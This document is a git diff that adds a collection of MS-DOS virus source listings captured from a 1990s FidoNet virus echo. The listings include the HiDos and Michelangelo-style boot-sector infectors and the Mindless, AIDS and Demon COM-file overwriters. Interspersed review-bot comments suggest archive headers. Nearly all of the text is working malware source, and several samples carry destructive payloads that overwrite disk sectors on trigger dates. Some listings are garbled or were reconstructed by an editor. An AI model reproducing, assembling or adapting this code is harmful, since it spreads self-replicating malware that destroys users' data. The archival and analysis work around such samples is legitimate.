@@ -0,0 +1,246 @@ +; PVT.VIRII (2:465/65.4) PVT.VIRII +; Msg : 29 of 54 +; From : MeteO 2:5030/136 Tue 09 Nov 93 09:14 +; To : - *.* - Fri 11 Nov 94 08:10 +; Subj : HIDOS.ASM +; +;.RealName: Max Ivanov +; +;* Kicked-up by MeteO (2:5030/136) +;* Area : VIRUS (Int: p p) +;* From : Daniel Hendry, 2:283/718 (06 Nov 94 16:50) +;* To : Doug Bryce +;* Subj : HIDOS.ASM +; +;@RFC-Path: +;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7 +;18.n283!not-for-mail +;@RFC-Return-Receipt-To: Daniel.Hendry@f718.n283.z2.fidonet.org + NAME boot + PAGE 55,132 + TITLE FILE UTIL + + + + +code segment + + ASSUME CS:CODE,DS:CODE,ES:CODE + + org 100h + +main: jmp over + db '[' +id db 'HiDos]',0 +by db 'By Apache',0 +over: xor ax,ax + mov ds,ax + cli + mov ss,ax + mov sp,7c00h + sti + mov ax,ds:[004eh] + mov word ptr ds:[int13+7b02h],ax + mov ax,ds:[004ch] + mov word ptr ds:[int13+7b00h],ax + mov ax,ds:[0413h] + dec ax + dec ax + mov ds:[0413h],ax + mov cl,06h + shl ax,cl + mov es,ax + mov word ptr ds:[bigj+7b02h],es + mov ax,offset jumpt + mov word ptr ds:[bigj+7b00h],ax + mov cx,0400h + push cs + pop ds + mov si,7c00h + mov di,0100h + cld + repz + movsb + push cs + pop ds + jmp cs:[bigj+7b00h] + +jumpt: push cs + pop ds + mov si,offset drive + cmp byte ptr ds:[si],80h + jz hdone + mov bx,0300h + mov cx,0001h + mov dx,0080h + push cs + pop es + call hdread + cmp ds:[0304h],'iH' + jz hdone + mov bx,0300h + mov cx,0007h + mov dx,0080h + call hdwrit + mov si,04beh + mov di,02beh + mov cx,0042h + cld + repz + movsb + mov byte ptr ds:[drive],80h + mov bx,0100h + mov cx,0001h + mov dx,0080h + call hdwrit + mov byte ptr ds:[drive],00h + +hdone: xor ax,ax + mov word ptr cs:[boot+2],ax + mov es,ax + push cs + pop ds + mov ax,0201h + mov bx,7c00h + mov word ptr ds:[boot],bx + mov si,offset drive + cmp byte ptr ds:[si],80h + jz hload + mov cx,0003h + mov dx,0100h + jmp fload +hload: mov cx,0007h + mov dx,0080h +fload: mov di,'rv' + int 13h + mov si,offset drive + mov 
byte ptr cs:[si],00h + xor ax,ax + mov es,ax + mov ds,ax + mov ax,offset nint13 + mov ds:[004ch],ax + mov ds:[004eh],cs + push cs + pop ds + jmp cs:[boot] + +hdwrit: mov ax,0301h + mov di,'rv' + jmp xx4 +hdread: mov ax,0201h + mov di,'rv' +xx4: int 13h + ret + +nint13: cmp di,'rv' + jz iv13 + cmp ah,02h + jnz wcheck + cmp cl,01h + jnz wcheck + cmp dh,00h + jnz wcheck + cmp dl,80h + jz check1 + cmp dl,00h + jnz wcheck +check1: push ax + push bx + push cx + push dx + push ds + push es + push di + mov bx,0300h + push cs + pop es + call hdread + mov si,offset [id+0200h] + cmp es:[si],'iH' + jz redirect + jmp iflopd +redirect: cmp dl,80h + jnz rdirfl + pop di + pop es + pop ds + pop dx + pop cx + pop bx + pop ax + mov cx,0007h + jmp a13 + +rdirfl: pop di + pop es + pop ds + pop dx + pop cx + pop bx + pop ax + mov cx,0003h + mov dx,0100h +a13: mov ax,0201h +iv13: jmp v13 + + +wcheck: cmp ah,03h + jnz v13 + cmp dl,00h + jnz v13 + push ax + push bx + push cx + push dx + push ds + push es + push di + push cs + pop es + mov bx,0300h + mov cx,0001h + xor dx,dx + call hdread + mov si,offset [id+0200h] + cmp es:[si],'iH' + jz iflopd + mov cx,0003h + mov dx,0100h + mov bx,0300h + call hdwrit + mov bx,0100h + xor dx,dx + mov cx,0001h + call hdwrit +iflopd: pop di + pop es + pop ds + pop dx + pop cx + pop bx + pop ax +v13: db 0eah +int13 dd 0h +drive db 0h +bigj dd 0h +boot dd 0h + +code ends + +end main + +;-+- GEcho 1.10+ +; + Origin: Hans' Point with DOSBoss West, Amsterdam (2:283/718) +;============================================================================= +; +;Yoo-hooo-oo, -! +; +; +; The MeeO +; +;/i Initialize all segments +; +;--- Aidstest Null: /Kill +; * Origin: PVT.ViRIImainboard / Virus Research labs. (2:5030/136) + diff --git a/MSDOS/Virus.MSDOS.Unknown.vir40.asm b/MSDOS/Virus.MSDOS.Unknown.vir40.asm new file mode 100644 index 00000000..c31fce68 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vir40.asm 
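Review bot: The only descriptive text in this file is `TITLE FILE UTIL` and `NAME boot`, which misdescribe it, so an archivist or analyst has to read the code to learn what the sample is; a short header comment should record the indicators that are visible in the listing. Those are the `'[HiDos]'` / `'By Apache'` strings, the `'iH'` marker compared at `ds:[0304h]` and `es:[si]`, the rewrite of the INT 13h vector at `0:4Ch`/`0:4Eh` to point at `nint13`, and the decrement by 2 of the BIOS memory-size word at `0:413h` (presumably 2 KB taken off the top of memory; the unit is my inference). The `'rv'` value loaded into DI before each `int 13h` also looks like the handler's own-call tag (`cmp di,'rv'` at the top of `nint13`) and is worth naming in the same header, since it is the kind of detail a detection write-up needs.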
@@ -0,0 +1,220 @@ +; PVT.VIRII (2:465/65.4) PVT.VIRII +; Msg : 30 of 54 +; From : MeteO 2:5030/136 Tue 09 Nov 93 09:14 +; To : - *.* - Fri 11 Nov 94 08:10 +; Subj : MINDLESS.ASM +; +;.RealName: Max Ivanov +; +;* Kicked-up by MeteO (2:5030/136) +;* Area : VIRUS (Int: p p) +;* From : Fred Lee, 2:283/718 (06 Nov 94 16:51) +;* To : Gilbert Holleman +;* Subj : MINDLESS.ASM +; +;@RFC-Path: +;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7 +;18.n283!not-for-mail +;@RFC-Return-Receipt-To: Fred.Lee@f718.n283.z2.fidonet.org +; + + + +mindless segment byte + assume cs:mindless,ds:mindless,ss:mindless + + org 100h + +victem equ 09Eh + +yam proc near + + jmp virus_fix ;location of victem name +yam endp + +virus_fix proc near + ;attempt crashing debugger + mov cx,09ebh ;fake command + mov ax,0fe05h ;fake command + jmp short $-2 ;do real commands + + adc ah,3bh ;fake command + jmp short $-10 ;do real commands + + + push ds + xor ax,ax ;instead of XORring ax, you + ;should work out it's alue + ;after the above mess, then + ;subtract it so noone knows + ;it's real value. + + push ax + mov ah,2ah ;Get system date + int 21h + + cmp al,0 ;Is it Sunday? + jne not_sunday ;not sunday? no damage then.. + +start_damage: + mov ax,3301h ; + xor dl,dl ;determine ctrl/break state + int 21h + + mov cx,msg_length ;prepare to write our messag + lea si,message ;These are the bytes to move + +decrypt_message: + mov al,byte ptr [si] ;get byte to decrypt + xor al,1 ;xor it with 1 + mov byte ptr [si],al ;store it + inc si ;go to next cypher + loop decrypt_message ;get another character + +damage: + cmp byte ptr drive_num,27 ;have we past drive z? 
+ ja no_more_disks ;if yes, exit damage routine + pushf ;don't let flags be altered + mov al,byte ptr drive_num + mov cx,word ptr num_secs + xor dx,dx ;first sector + lea bx,message ;data to write + int 26h ;absolute write to disk + popf ;restore flags + inc byte ptr drive_num ;try another drive + jmp short damage ; + +no_more_disks: + mov dl,2ch ;check ctrl/C state + int 21h + and dl,0fh + or dl,dl ;Set Flags + je hang_machine + mov cx,1980 ;prepare system year + xor dx,dx ;prepare system month and day + mov ah,2bh ;Set system date + int 21h + xor cx,cx ;prepare system hour/minute + xor dx,dx ;prepare system seconds + mov ah,2dh ;Set system time + int 21h + mov ax,3301h ;check/set ctrl/C status + mov dl,01 + int 21h + mov ax,4c00h ;Drop to DOS, no error code + int 21h + +; +; + + +hang_machine: + jmp $ + +not_sunday: + mov al,dl + mov dl,0c0h + push ds + mov bx,78h + xor ax,ax + mov ds,ax ; ds=0 + mov ax,word ptr [bx] + mov bx,ax + mov al,byte ptr [bx] + and al,0fh + or al,dl + mov byte ptr [bx],al + xor ah,ah ;reset drive + int 13h + pop ds ;restore ds + + push ds ;keep it stored, though + mov bx,78h + xor ax,ax + mov ds,ax ;ds=0 + mov ax,word ptr [bx] + mov bx,ax + mov al,byte ptr [bx] + pop ds ;restore ds + + push ax + mov bx,0fah ;ultra hi speed?? 
+ mov ax,0305h ;Adjust keyboard rate/delay + int 16h + + mov ax,4e00h ;DOS Search_First + lea dx,com_file ;Look for a COM file + int 21h + +infect: + mov ax,4300h ;get/set file attribs + mov dx,offset victem + int 21h + mov ax,4301h ;get/set file attribs + and cx,00feh ; + int 21h + mov ax,3d01h ;open file + mov dx,offset victem + int 21h + mov bx,ax ;file handle + mov ax,5700h ;get file time + int 21h + push cx ;store it + push dx ;stor it + mov dx,0100h + mov cx,01a7h + mov ah,40h + int 21h ;write file using file handle + pop dx + pop cx + mov ax,5701h + int 21h ;set file date & time + mov ah,3eh ;close file via handle + int 21h + mov ah,4fh ;DOS Search_Next + int 21h + ja infect ;infect if good one found + int 20h ;bail out + +drive_num db 0 +num_secs dw 20 ;should be enough to kill with + +com_file db '*.COM',0 ;'*.c*' leaves too much room + ; for error. + +; This was not encrypted properly!! +; I have corrected what I could figure out. + +message db 0fah ;??What's this?? + + db 'Xntmfrsddr!' ;Youngsters + db '@f`hmrs!' ;Against + db 'Lb@eedd' ;McAffee + + db '\!,' + db 'O@U@R!L@TO@T' ;NATAS KAUPAS + + db 0ffh,0ffh ;spaces (cr/lf not useful...) + + db 'Uid!Lhoemdrr!Whstr!w1/0!' ;virus name, version +msg_length equ $-message + + +virus_fix endp +mindless ends + end yam + +;-+- Terminate 1.50/Pro +; + Origin: Hard disks never die... (2:283/718) +;============================================================================= +; +;Yoo-hooo-oo, -! +; +; +; The MeeO +; +;/P[=NNNNN] Pack code segments +; +;--- Aidstest Null: /Kill +; * Origin: PVT.ViRIImainboard / Virus Research labs. (2:5030/136) + diff --git a/MSDOS/Virus.MSDOS.Unknown.vir41.pas b/MSDOS/Virus.MSDOS.Unknown.vir41.pas new file mode 100644 index 00000000..f698589c --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vir41.pas 
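Review bot: This listing was edited by a third party after the fact — `; This was not encrypted properly!! ; I have corrected what I could figure out.`, `message db 0fah ;??What's this??` and `db 0ffh,0ffh ;spaces (cr/lf not useful...)` are an editor's notes, not the author's — yet neither the file nor the commit says it is a reconstruction. The hard-coded length `mov cx,01a7h`, where the other copy of this program (vir38.asm) uses the assembler expression `(vend-vstart)`, is consistent with this copy having been typed back from a disassembly, though that is an inference. A provenance line at the top such as `; Edited/reconstructed listing - see the editor's notes around 'message'; not a byte-faithful copy of the original` would stop it being catalogued as original source.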
@@ -0,0 +1,168 @@ +; PVT.VIRII (2:465/65.4) PVT.VIRII +; Msg : 31 of 54 +; From : MeteO 2:5030/136 Tue 09 Nov 93 09:14 +; To : - *.* - Fri 11 Nov 94 08:10 +; Subj : AIDS.PAS +; +;.RealName: Max Ivanov +; +;* Kicked-up by MeteO (2:5030/136) +;* Area : VIRUS (Int: p p) +;* From : Mike Nisbett, 2:283/718 (06 Nov 94 16:52) +;* To : Alan Jones +;* Subj : AIDS.PAS +; +;@RFC-Path: +;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7 +;18.n283!not-for-mail +;@RFC-Return-Receipt-To: Mike.Nisbett@f718.n283.z2.fidonet.org +{C-} +{U-} +{I-} { Won't allow a user break, enable IO check } + +{ -- Constants --------------------------------------- } + +Const + VirusSize = 13847; { AIDS' code size } + + Warning :String[42] { Warning message } + = 'This File Has Been Infected By AIDS! HaHa!'; + +{ -- Type declarations------------------------------------- } + +Type + DTARec =Record { Data area for file search } + DOSnext :Array[1..21] of Byte; + Attr : Byte; + Ftime, + FDate, + FLsize, + FHsize : Integer; + FullName: Array[1..13] of Char; + End; + +Registers = Record {Register set used for file search } + Case Byte of + 1 : (AX,BX,CX,DX,BP,SI,DI,DS,ES,Flags : Integer); + 2 : (AL,AH,BL,BH,CL,CH,DL,DH : Byte); + End; + +{ -- Variables--------------------------------------------- } + +Var + { Memory offset program code } + ProgramStart : Byte absolute Cseg:$100; + { Infected marker } + MarkInfected : String[42] absolute Cseg:$180; + Reg : Registers; { Register set } + DTA : DTARec; { Data area } + Buffer : Array[Byte] of Byte; { Data buffer } + TestID : String[42]; { To recognize infected files } + UsePath : String[66]; { Path to search files } + { Lenght of search path } + UsePathLenght: Byte absolute UsePath; + Go : File; { File to infect } + B : Byte; { Used } + LoopVar : Integer; {Will loop forever} + +{ -- Program code------------------------------------------ } + +Begin + GetDir(0, UsePath); { get current directory } + if Pos('\', UsePath) <> 
UsePathLenght then + UsePath := UsePath + '\'; + UsePath := UsePath + '*.COM'; { Define search mask } + Reg.AH := $1A; { Set data area } + Reg.DS := Seg(DTA); + Reg.DX := Ofs(DTA); + MsDos(Reg); + UsePath[Succ(UsePathLenght)]:=#0; { Path must end with #0 } + Reg.AH := $4E; + Reg.DS := Seg(UsePath); + Reg.DX := Ofs(UsePath[1]); + Reg.CX := $ff; { Set attribute to find ALL files } + MsDos(Reg); { Find first matching entry } + IF not Odd(Reg.Flags) Then { If a file found then } + Repeat + UsePath := DTA.FullName; + B := Pos(#0, UsePath); + If B > 0 then + Delete(UsePath, B, 255); { Remove garbage } + Assign(Go, UsePath); + Reset(Go); + If IOresult = 0 Then { If not IO error then } + Begin + BlockRead(Go, Buffer, 2); + Move(Buffer[$80], TestID, 43); + { Test if file already ill(Infected) } + If TestID <> Warning Then { If not then ... } + Begin + Seek (Go, 0); + { Mark file as infected and .. } + MarkInfected := Warning; + { Infect it } + BlockWrite(Go,ProgramStart,Succ(VirusSize shr 7)); + Close(Go); + Halt; {.. and halt the program } + End; + Close(Go); + End; + { The file has already been infected, search next. } + Reg.AH := $4F; + Reg.DS := Seg(DTA); + Reg.DX := Ofs(DTA); + MsDos(Reg); + { ......................Until no more files are found } + Until Odd(Reg.Flags); +Loopvar:=Random(10); +If Loopvar=7 then +begin +Writeln(''); {Give a lot of smiles} +Writeln(''); +Writeln(' @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @'); +Writeln(' @ ATTENTION: @'); +Writeln(' I have been elected to inform you that throughout your process of '); +Writeln(' @ collecting and executing files, you have accidentally HK @'); +Writeln(' yourself over; again, that''s PHUCKED yourself over. No, it cannot '); +Writeln(' @ be; YES, it CAN be, a s has infected your system. Now what do @'); +Writeln(' you have to say about that? HAHAHAHA. 
Have H with this one and '); +Writeln(' @ remember, there is NO cure for @'); +Writeln(' '); +Writeln(' @ @'); +Writeln(' ۱ ۱ ۱ ۱ '); +Writeln(' @ ۱ ۱ ۱ ۱ ۱ ۱ @'); +Writeln(' ۱ ۱ ۱ ۱ ۱ ۱ '); +Writeln(' @ ۱ ۱ ۱ ۱ @'); +Writeln(' ۱۱ ۱ ۱ ۱ ۱ '); +Writeln(' @ ۱ ۱ ۱ ۱ ۱ ۱ @'); +Writeln(' ۱ ۱ ۱ ۱ ۱ ۱ '); +Writeln(' @ ۱ ۱ ۱ ۱ @'); +Writeln(' '); +Writeln(' @ @'); +Writeln(' @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @'); +REPEAT +LOOPVAR:=0; +UNTIL LOOPVAR=1; +end; +End. + + +{ Although this is a primitive virus its effective. } +{ In this virus only the .COM } +{ files are infected. Its about 13K and it will } +{ change the date entry. } + +;-+- CrossPoint v3.02 +; + Origin: The Hamburger Haven 1-318-478-9940 (2:283/718) +;============================================================================= +; +;Yoo-hooo-oo, -! +; +; +; The MeeO +; +;/A=NNNN Set NewExe segment alignment factor +; +;--- Aidstest Null: /Kill +; * Origin: PVT.ViRIImainboard / Virus Research labs. (2:5030/136) + diff --git a/MSDOS/Virus.MSDOS.Unknown.vir42.asm b/MSDOS/Virus.MSDOS.Unknown.vir42.asm new file mode 100644 index 00000000..88a4a98e --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vir42.asm 
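Review bot: The committed text is not byte-faithful: the `Writeln` block has been re-encoded (the `۱` characters presumably stood for block-graphic bytes in the original code page; I cannot tell which) and several words have lost characters in transfer (`accidentally HK yourself over`, `a s has infected your system`, `Have H with this one`), so a hash of this file will not match the original sample and the banner no longer reads as written. The file also keeps the Fido message header as `;`-prefixed lines, which is the convention of the .asm files in this commit but not Pascal comment syntax, so the `.pas` extension describes only the body. Either re-import from a byte-faithful source or add a header stating what this is, e.g. `{ Message capture: high-bit characters re-encoded and some characters lost in transfer - not the original bytes }`.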
@@ -0,0 +1,162 @@ +; PVT.VIRII (2:465/65.4) PVT.VIRII +; Msg : 32 of 54 +; From : MeteO 2:5030/136 Tue 09 Nov 93 09:14 +; To : - *.* - Fri 11 Nov 94 08:10 +; Subj : DEMON.ASM +; +;.RealName: Max Ivanov +; +;* Kicked-up by MeteO (2:5030/136) +;* Area : VIRUS (Int: p p) +;* From : Bryan Sullivan, 2:283/718 (06 Nov 94 16:57) +;* To : Dr T. +;* Subj : DEMON.ASM +; +;@RFC-Path: +;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7 +;18.n283!not-for-mail +;@RFC-Dt: 19-Oct-91 04:19 +;@RFC-Return-Receipt-To: Bryan.Sullivan@f718.n283.z2.fidonet.org +;By: Skin Head +;To: All +;Re: New Source Code + +;========== Demon virus ==================================== 22.09.91 ======== +; +; Assemble and link with: TASM DEMON.VIR +; TLINK DEMON /X/T +; Infect all .COM programs in current directory with: DEMON +; +; !!! NOT ON A TUESDAY !!! +; +;-------------- Constants and structures + +Tuesday = 2 ; INT 21h, AH=2Ah + +Search_Rec struc ; directory search record + db 21 dup (?) ; reserved for DOS + FileAttr db ? ; file attribute + FileTime dw ? ; packed file time + FileDate dw ? ; packed file date + FileSize dd ? ; long file size + FileName db 13 dup (?) ; ASCIIZ FILENAME.EXT +Search_Rec ends + +;-------------- Demon virus segment + +Virus segment + assume cs:Virus,ds:Virus,es:Virus,ss:Virus + + org 0080h +DTA Search_Rec <> ; disk transfer area + + org 0100h +Demon: ; virus entry point +Virus_Size = Virus_End - Demon ; virus size = 272 bytes + + mov dx,offset All_COM ; find first .COM file, + mov ah,4eh ; including hidden/system + mov cx,110bh + int 21h + nop + jnc Infect ; abort if no files found + jmp short Check_Day +Infect: call Replicate ; overwrite first 272 bytes + mov dx,offset DTA + mov ah,4fh ; find next .COM file, + int 21h ; go check day if none found + nop ; else repeat + jnc Next_File + jmp short Check_Day +Next_File: jmp Infect +Check_Day: mov ah,2ah ; get DOS date, check day + int 21h + cmp al,Tuesday ; Tuesday ? 
+ je Thrash_Drive ; if yes, thrash drive C: + mov ah,4ch ; else exit to DOS + int 21h + +Thrash_Drive: mov Counter,0 ; overwrite first 160 sectors + jmp Write_Sectors ; of drive C: with garbage +Write_Sectors: mov al,Drive_C ; Error: doesn't work ! + mov cx,160 ; AL=C:, CX=160 sectors + mov dx,0 ; DX=highest sector in drive ! + mov bx,0 ; DS:BX=start of PSP area + int 26h ; overwrite sectors + inc Counter + cmp Counter,10 ; repeat 10 times + je Show_Msg + jne Write_Sectors +Show_Msg: mov ah,09h ; show a fake error message + mov dx,offset Virus_Msg ; and exit to DOS + int 21h + mov ah,4ch + int 21h + +Replicate: mov dx,offset DTA.FileName ; save file attribute + mov ax,4300h + int 21h + mov COM_Attr,cx + nop + xor cx,cx ; unprotect the .COM file + mov ax,4301h ; in case it's read-only + int 21h + nop + mov ax,3d02h ; open .COM file for R/W, + int 21h ; abort on error + nop + jc Check_Day + mov bx,ax ; BX = file handle + mov ax,5700h + int 21h ; save file date and time + nop + mov COM_Time,cx + mov COM_Date,dx + mov dx,offset Demon ; overwrite first 272 bytes + mov ah,40h ; of .COM program file + mov cx,Virus_Size ; with the virus code + int 21h + nop + mov ax,5701h ; restore file date and time + mov dx,COM_Date + mov cx,COM_Time + int 21h + mov ah,3eh ; close the file + int 21h + nop + mov dx,offset DTA.FileName ; restore file attribute + mov cx,COM_Attr + mov ax,4301h + int 21h + retn + +All_COM db '*.COM',0 ; dir search specification +COM_Date dw 0 ; packed .COM program date +COM_Time dw 0 ; packed .COM program time +COM_Attr dw 0 ; .COM program file attribute +Counter db 0 ; used when thrashing drive C: +Drive_C db 2 ; INT 26h C: drive number + dw 0 +Copyright db 'Demonhyak Viri X.X (c) by Cracker Jack 1991 (IVRL)' + dw 0 +Virus_Msg db 10,13,'Error eating drive C:',10,13,'$' + +Virus_End label byte ; virus code+data end + +Virus ends + end Demon + +;-+- FastEcho/386 1.41.b7/Real +; + Origin: Hans' Point with DOSBoss West, Amsterdam (2:283/718) 
+;============================================================================= +; +;Yoo-hooo-oo, -! +; +; +; The MeeO +; +;/zi,/zd,/zn Debug info: zi=full, zd=line numbers only, zn=none +; +;--- Aidstest Null: /Kill +; * Origin: PVT.ViRIImainboard / Virus Research labs. (2:5030/136) + diff --git a/MSDOS/Virus.MSDOS.Unknown.vir43.asm b/MSDOS/Virus.MSDOS.Unknown.vir43.asm new file mode 100644 index 00000000..d7b8492c --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vir43.asm 
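Review bot: The author's own comments mark the drive-overwrite routine as broken (`Write_Sectors: ... ; Error: doesn't work !` and `; DX=highest sector in drive !`), and that caveat belongs in an archive header so the sample is classified by what the listing shows rather than by the intent stated in its banner. The identifiers a cataloguer needs are all in the data area and could be collected into the same header: the search mask `All_COM db '*.COM',0`, the `Copyright` string `'Demonhyak Viri X.X (c) by Cracker Jack 1991 (IVRL)'`, the fake error text `'Error eating drive C:'`, and the trigger `cmp al,Tuesday` with `Tuesday = 2` taken from the INT 21h/AH=2Ah day-of-week value. Something like `; Archive note: payload routine marked non-functional by the author (see Write_Sectors); trigger = day-of-week 2 (Tuesday); identifying strings in All_COM, Copyright, Virus_Msg` at the top would make the entry searchable without reading the code.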
@@ -0,0 +1,251 @@ +; PVT.VIRII (2:465/65.4) PVT.VIRII +; Msg : 33 of 54 +; From : MeteO 2:5030/136 Tue 09 Nov 93 09:14 +; To : - *.* - Fri 11 Nov 94 08:10 +; Subj : MICHANGL.A1 +; +;.RealName: Max Ivanov +; +;* Kicked-up by MeteO (2:5030/136) +;* Area : VIRUS (Int: p p) +;* From : Ron Toler, 2:283/718 (06 Nov 94 16:58) +;* To : Mike Salvino +;* Subj : MICHANGL.A1 +; +;@RFC-Path: +;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7 +;18.n283!not-for-mail +;@RFC-Return-Receipt-To: Ron.Toler@f718.n283.z2.fidonet.org +obsluha 13h: push ds + push ax + or dl,dl ; drive a: ? + jnz loc_1 ; ak nie, stara obsluha + xor ax,ax ; ak ano, pozri ci motor bezi + mov ds,ax ; (ked bezi, tak by odbiehanie + ; na boot sektor bolo napadne + ; - hrcal by disk, pri zapnuti + ; sa to strati) + test byte ptr ds:[43Fh],1 ; (0000:043F=10h) + jnz loc_1 ; ak bezi, tak stara obsluha + pop ax ; ak nebezi, tak stara obsluha + pop ds + pushf + call dword ptr cs:[0Ah] + pushf ; Push flags + call sub_1 ; rozmnoz sa na a: + popf ; Pop flags + retf 2 ; vrat sa z int s tymito flagmi +loc_1: + pop ax + pop ds + jmp dword ptr cs:[0Ah] ; stara obsluha + +; +; MNOZENIE SA +; + +sub_1 proc near + push ax ; SCHOVAJ REGS + push bx + push cx + push dx + push ds + push es + push si + push di + push cs + pop ds + push cs + pop es + mov si,4 +loc_2: + mov ax,201h ; 1 sektor citaj + mov bx,200h ; za seba (si 512 b. dlhy) + mov cx,1 ; boot sektor (1. na 0. stope) + xor dx,dx ; disk a: + pushf + call dword ptr ds:[0Ah] ; stara obsluha + jnc loc_3 ; error ? 
+ xor ax,ax ; error - disk reset + pushf ; + call dword ptr ds:[0Ah] ; (6C20:000A=0AF1Ah) + dec si + jnz loc_2 ; skus to 4 x + jmp short loc_6 ; a ked nic, vykasli sa na to +loc_3: + xor si,si ; vsetko ok, pokracujeme + cld + lodsw ; porovnaj prve 4 byte z bootu + cmp ax,[bx] ; so sebou, aby si zistil, ci + jne loc_4 ; uz si tam - nakazeny disk + lodsw + cmp ax,[bx+2] + je loc_6 ; ak si tam, netrba infikovat + ; "AIDS staci dostat raz." +loc_4: + mov ax,301h ; avsak ak tam nie si, tak + mov dh,1 ; ten disk nakaz + mov cl,3 ; nastav znacku, kam odlozit + cmp byte ptr [bx+15h],0FDh ; povodny boot + je loc_5 ; (do ktoreho sektora) + mov cl,0Eh ; podla typu diskety +loc_5: ; (0e - HD, 3 - DD, 7 - hard) + mov word ptr ds:[8],cx ; uloz znacku + pushf ; a zapis povodny boot + call dword ptr ds:[0Ah] + jc loc_6 ; error - neda sa - vyskoc von + mov si,3BEh ; dopis originalnu partition + mov di,1BEh ; na svoj koniec + mov cx,21h + cld + rep movsw + mov ax,301h ; a zapis sa do bootu + xor bx,bx + mov cx,1 + xor dx,dx + pushf ; cez staru int 13h + call dword ptr ds:[0Ah] +loc_6: + pop di ; hotovo - koniec + pop si + pop es + pop ds + pop dx + pop cx + pop bx + pop ax + retn +sub_1 endp + +START VIRUSU xor ax,ax + mov ds,ax ; DS NA NULU + cli ; Disable interrupts + mov ss,ax ; stack pod seba + mov ax,7C00h ; tu si - natiahol si sa + mov sp,ax ; z bootu - sp pod seba + sti ; Enable interrupts + push ds ; schovaj ds,ax + push ax + mov ax,word ptr ds:[4Ch] ; odloz si staru obsluhu int13h + mov word ptr ds:[7C0Ah],ax + mov ax,word ptr ds:[4Eh] + mov word ptr ds:[7C0Ch],ax + mov ax,word ptr ds:[413h] ; top of memory zmensi o 2K + dec ax + dec ax + mov word ptr ds:[413h],ax + mov cl,6 ; prepocitaj na paragr. adr. + shl ax,cl + mov es,ax ; nastav es + mov word ptr ds:[7C05h],ax ; a odloz si ju sem + mov ax,0Eh ; toto je offset noveho int13h + mov word ptr ds:[4Ch],ax ; nastav ten novy int + mov word ptr ds:[4Eh],es + mov cx,1BEh ; skopiruj sa do vyhr. 2K pam. 
+ mov si,7C00h + xor di,di + cld + rep movsb + jmp dword ptr cs:[7C03h] ; a skoc na seba po skopirovani + xor ax,ax ; sem skocis + mov es,ax ; 0 do es + int 13h ; reset disk a: + push cs ; cs do ds + pop ds + mov ax,201h ; precitaj boot + mov bx,7C00h ; do 7c00 + mov cx,word ptr ds:[8] ; pozri si znacku, kde mas ulo- + ; zeny povodny boot + cmp cx,7 ; ak je to 7 - tak si na harde + jne loc_7 ; inak si na diskete + mov dx,80h ; na harde - c: + int 13h ; precitaj originalny boot + jmp short loc_8 ; a pokracuj +loc_7: + mov cx,word ptr ds:[8] ; precitaj si kde mas boot + mov dx,100h ; z diskety + int 13h + jc loc_8 ; error - nejde to - skonci + push cs ; ak to ide cs do es + pop es + mov ax,201h ; a precitaj si este boot + mov bx,200h ; za seba + mov cx,1 + mov dx,80h ; ale z hardu + int 13h + jc loc_8 ; chyba - von + xor si,si ; porovnaj sa s bootom + cld ; ci je harddisk nakazeny + lodsw + cmp ax,[bx] + jne loc_13 + lodsw + cmp ax,[bx+2] + jne loc_13 ; ak nie je nakazeny - nakaz +loc_8: + xor cx,cx ; 0 do cx + mov ah,4 + int 1Ah ; pozri si datum + ; ci je 6. 3. + cmp dx,306h + je loc_9 ; ak je 6.3. - akcia + retf ; ak nie - von +loc_9: + xor dx,dx ; TOT' UCINOK VIRUSU + mov cx,1 ; zacni na 0. stope a 1. sktr +loc_10: + mov ax,309h ; zapis 9 sektorov + mov si,word ptr ds:[8] ; pozri typ disku + cmp si,3 ; disketa -> rovno zapis + je loc_11 + mov al,0Eh ; HD disketa -> 14 sektorov + cmp si,0Eh + je loc_11 ; a rovno zapis + mov dl,80h ; nie disketa - hard + mov byte ptr ds:[7],4 ; tak nie 2, ale 4 hlavy + mov al,11h ; a 17 sektorov/ track +loc_11: + mov bx,5000h ; zober hocico z pamati + mov es,bx + int 13h ; a zapis na disk + jnc loc_12 ; nie je chyba - pokracuj + xor ah,ah ; chyba - reset disk + int 13h +loc_12: + inc dh ; dalsia hlava ? + cmp dh,byte ptr ds:[7] ; max. 
headroom + jb loc_10 ; este nie - pokracuj + xor dh,dh ; ano - opat hlava 0 + inc ch ; dalsi track + jmp short loc_10 ; a znova +loc_13: + mov cx,7 ; NAKAZENIE HARDU + mov word ptr ds:[8],cx ; sem uloz povodny boot + mov ax,301h + mov dx,80h + int 13h + jc loc_8 ; error - out + mov si,3BEh ; no error - dopis partition + mov di,1BEh + mov cx,21h + rep movsw + mov ax,301h ; a zapis sa do bootu + xor bx,bx + inc cl + int 13h + jmp short loc_8 ; a chod von + +-+- DinoMail v.1.0 Alpha + + Origin: I just hate people who create virusses... (2:283/718) +============================================================================= + +Yoo-hooo-oo, -! + + + The MeeO + +/Txx Specify output file type + +--- Aidstest Null: /Kill + * Origin: PVT.ViRIImainboard / Virus Research labs. (2:5030/136) + diff --git a/MSDOS/Virus.MSDOS.Unknown.vir44.asm b/MSDOS/Virus.MSDOS.Unknown.vir44.asm new file mode 100644 index 00000000..8895e5ab --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vir44.asm 
